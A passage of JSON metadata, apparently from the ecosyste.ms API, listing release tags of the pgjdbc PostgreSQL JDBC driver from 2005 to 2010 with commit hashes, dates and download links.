b.com/pgjdbc/pgjdbc/tar.gz/REL8_2_512","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_512","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_512","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_512","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_512/manifests"},{"name":"REL9_0_801","sha":"2e39cc38ddc3ba8028f0acd45bad69dc4d3d691b","kind":"commit","published_at":"2010-09-20T21:32:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_0_801","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_0_801","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_0_801","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_0_801","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_0_801/manifests"},{"name":"REL8_0_325","sha":"f7842c2feb40e7e7549f2ed54fb3df1cd4ef7386","kind":"commit","published_at":"2010-05-12T06:41:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_325","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_325","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_325","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_325","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_325/manifests"},{"name":"REL8_1_415","sha":"1219f0e80e5662997d460cb28148577c71e00432","kind":"commit","published_at":"2010-05-12T06:40:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_415","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_415","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_415","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_415","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_415/manifests"},{"name":"REL8_2_511","sha":"f597791a65c8c277c7cdb2a92709637352b1fde7","kind":"commit","published_at":"2010-05-12T06:40:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_511","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_511","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_511","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_511","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_511/manifests"},{"name":"REL8_3_606","sha":"5e1cb768622fcf53818de0318004166d1c942587","kind":"commit","published_at":"2010-05-12T06:39:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_606","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_606","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_606","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_606","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_606/manifests"},{"name":"REL8_4_702","sha":"034baa3e624ac87b11111480d1b4e35a2583a854","kind":"commit","published_at":"2010-05-12T06:36:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_4_702","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_4_702","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_4_702","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_702","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_702/manifests"},{"name":"REL8_0_324","sha":"a69999ff3b80ceb3777817d08496468edc725765","kind":"commit","published_at":"2009-07-01T05:16:24.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_324","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_324","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_324","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_324","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_324/manifests"},{"name":"REL8_1_414","sha":"ca013de95da92dadb9fafc940029fe15757ae2af","kind":"commit","published_at":"2009-07-01T05:16:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_414","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_414","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_414","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_414","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_414/manifests"},{"name":"REL8_2_510","sha":"a722ade8395fb287471001e0246f190a2b859552","kind":"commit","published_at":"2009-07-01T05:16:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_510","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_510","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_510","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_510","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_510/manifests"},{"name":"REL8_3_605","sha":"577936d8d7f7e9a1b6c7d725a96513a9b19498e3","kind":"commit","published_at":"2009-07-01T05:16:04.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_605","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_605","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_605","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_605","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_605/manifests"},{"name":"REL8_4_701","sha":"05af6314b92554e30034d49426b941ce621f9dee","kind":"commit","published_at":"2009-07-01T05:15:53.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_4_701","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_4_701","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_4_701","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_701","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_701/manifests"},{"name":"REL8_0_323","sha":"f2873cda04abcfb05695501c88dbee6bcd41d046","kind":"commit","published_at":"2008-11-16T13:46:05.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_323","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_323","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_323","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_323","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_323/manifests"},{"name":"REL8_1_413","sha":"2eb09ad9c7b2fddc88b4a87598f3734d4d2b433e","kind":"commit","published_at":"2008-11-16T13:45:57.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_413","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_413","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_413","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_413","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_413/manifests"},{"name":"REL8_2_509","sha":"3b35c0939abce6f600d19312c644475db6d0d4bd","kind":"commit","published_at":"2008-11-16T13:45:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_509","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_509","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_509","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_509","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_509/manifests"},{"name":"REL8_3_604","sha":"f8e3280f3cee126b0ad765fbdac92b40b784d469","kind":"commit","published_at":"2008-11-16T13:45:43.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_604","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_604","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_604","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_604","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_604/manifests"},{"name":"REL8_0_322","sha":"b3bc99ec992aa793817539a726416ed8c8df38cc","kind":"commit","published_at":"2008-01-31T09:55:58.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_322","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_322","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_322","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_322","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_322/manifests"},{"name":"REL8_1_412","sha":"c29d8b99429462a17d7ba0b8e8f6daedab92e80e","kind":"commit","published_at":"2008-01-31T09:55:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_412","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_412","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_412","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_412","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_412/manifests"},{"name":"REL8_2_508","sha":"2566771421d25f8b674a932e182e671504ce0480","kind":"commit","published_at":"2008-01-31T09:55:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_508","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_508","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_508","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_508","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_508/manifests"},{"name":"REL8_3_603","sha":"8a2eef81e45d07130e2d86bc8a18cc14642e2741","kind":"commit","published_at":"2008-01-31T09:54:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_603","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_603","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_603","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_603","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_603/manifests"},{"name":"REL8_0_321","sha":"4d7ea8b0061ef946705cbd46ee70cb5984f3a5e7","kind":"commit","published_at":"2007-12-02T08:31:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_321","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_321","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_321","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_321","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_321/manifests"},{"name":"REL8_1_411","sha":"4f487c433534b25222a81f7e80394ef3d52d72fe","kind":"commit","published_at":"2007-12-02T08:30:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_411","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_411","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_411","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_411","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_411/manifests"},{"name":"REL8_2_507","sha":"9f13dae31b5fdf75abd1552ec590749bf09e052d","kind":"commit","published_at":"2007-12-02T08:30:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_507","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_507","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_507","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_507","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_507/manifests"},{"name":"REL8_0_320","sha":"a72e305c0133dd8b962ab06cb991b44927317dd9","kind":"commit","published_at":"2007-07-31T06:07:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_320","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_320","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_320","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_320","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_320/manifests"},{"name":"REL8_1_410","sha":"5619f9ef751da6bfa6b619cf62716bb315f7eba8","kind":"commit","published_at":"2007-07-31T06:06:35.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_410","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_410","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_410","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_410","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_410/manifests"},{"name":"REL8_2_506","sha":"12eceb1ff7a04d25bf74bda80a59f37ac53110a3","kind":"commit","published_at":"2007-07-31T06:06:12.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_506","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_506","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_506","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_506","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_506/manifests"},{"name":"REL8_2_505","sha":"91879290313ab6f64e05f9f366c368dc8419516c","kind":"commit","published_at":"2007-04-18T08:15:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_505","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_505","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_505","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_505","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_505/manifests"},{"name":"REL8_1_409","sha":"ef22d89fe798811a7ac7a143b0620043eb0acd00","kind":"commit","published_at":"2007-04-18T08:14:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_409","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_409","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_409","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_409","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_409/manifests"},{"name":"REL8_0_319","sha":"859fe40b52d5e8c44184c19015bd1836478c7355","kind":"commit","published_at":"2007-04-18T08:13:26.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_319","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_319","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_319","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_319","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_319/manifests"},{"name":"REL8_2_504","sha":"80b0ce1be968813de3d56ff1670857015ce6862f","kind":"commit","published_at":"2006-12-01T12:02:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_504","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_504","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_504","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_504","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_504/manifests"},{"name":"REL8_1_408","sha":"db52e0e583a7b8af7c7d5da34f50c8f965baec6f","kind":"commit","published_at":"2006-12-01T11:57:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_408","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_408","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_408","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_408","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_408/manifests"},{"name":"REL8_0_318","sha":"50466b1014fd76ec445abe26b234c13dc7c0f338","kind":"commit","published_at":"2006-12-01T11:54:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_318","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_318","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_318","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_318","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_318/manifests"},{"name":"REL8_0_317","sha":"7bab436cbec9baec3cd36c6d320cdc4402fd718c","kind":"commit","published_at":"2006-05-23T23:07:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_317","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_317","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_317","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_317","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_317/manifests"},{"name":"REL8_1_407","sha":"d9e844e0f120b4401e178392c6d4293ac5e7d3cd","kind":"commit","published_at":"2006-05-23T23:07:09.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_407","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_407","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_407","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_407","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_407/manifests"},{"name":"REL8_0_316","sha":"027669dc50a5266603367853ba6a5a9e5fba91bd","kind":"commit","published_at":"2006-05-22T10:08:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_316","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_316","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_316","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_316","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_316/manifests"},{"name":"REL8_1_406","sha":"6b082944901866105f620900867a0e7eb8b96d91","kind":"commit","published_at":"2006-05-22T10:08:35.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_406","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_406","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_406","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_406","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_406/manifests"},{"name":"REL8_1_405","sha":"5dbd05a49a9c17f00528d7c8d885cfdeaacf3ad9","kind":"commit","published_at":"2006-02-09T17:04:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_405","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_405","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_405","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_405","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_405/manifests"},{"name":"REL8_0_315","sha":"90ed05f956d7269066a591086d9431191affa7bb","kind":"commit","published_at":"2006-02-09T17:04:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_315","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_315","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_315","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_315","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_315/manifests"},{"name":"REL8_1_404","sha":"d3f28b54df40c3eae08305d51d0219c689de4797","kind":"commit","published_at":"2005-11-06T06:45:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_404","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_404","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_404","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_404","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_404/manifests"},{"name":"REL8_0_314","sha":"5f21e4fa065eeb8719ff8f0ce593c9337f9d0335","kind":"commit","published_at":"2005-11-06T06:41:45.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_314","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_314","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_314","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_314","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_314/manifests"},{"name":"REL8_0_313","sha":"9cac940139c5c0f95a18199600309ed276daf0d5","kind":"commit","published_at":"2005-10-07T06:08:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_313","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_313","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_313","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_313","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_313/manifests"},{"name":"REL8_0_312","sha":"3ae53db8d3ca58443540e6e371e14027d3d85a0b","kind":"commit","published_at":"2005-07-24T11:05:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_312","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_312","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_312","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_312","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_312/manifests"},{"name":"REL8_0_311","sha":"ac526695a77433ceea00e1f8b4a9ba710607d2f2","kind":"commit","published_at":"2005-04-11T04:45:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_311","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_311","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_311","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_311","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_311/manifests"},{"name":"REL8_0_310","sha":"29a41dac2a3025af1d759924fcbd688cd9c8ee25","kind":"commit","